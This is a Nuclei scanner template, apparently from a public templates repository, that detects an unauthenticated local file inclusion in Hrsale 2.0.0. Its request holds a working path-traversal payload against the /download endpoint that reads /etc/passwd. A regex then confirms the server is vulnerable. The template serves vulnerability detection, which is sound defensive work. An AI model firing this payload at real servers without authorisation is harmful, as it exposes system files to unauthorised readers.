nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi....

27 lines
605 B
YAML
Raw Normal View History

2021-11-13 03:29:02 +00:00
id: hrsale-unauthenticated-lfi
2021-11-13 03:29:02 +00:00
info:
name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi
author: 0x_Akoko
severity: high
description: This exploit allow you to download any readable file from server without permission and login session
reference:
- https://www.exploit-db.com/exploits/48920
2021-11-13 03:29:02 +00:00
tags: hrsale,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200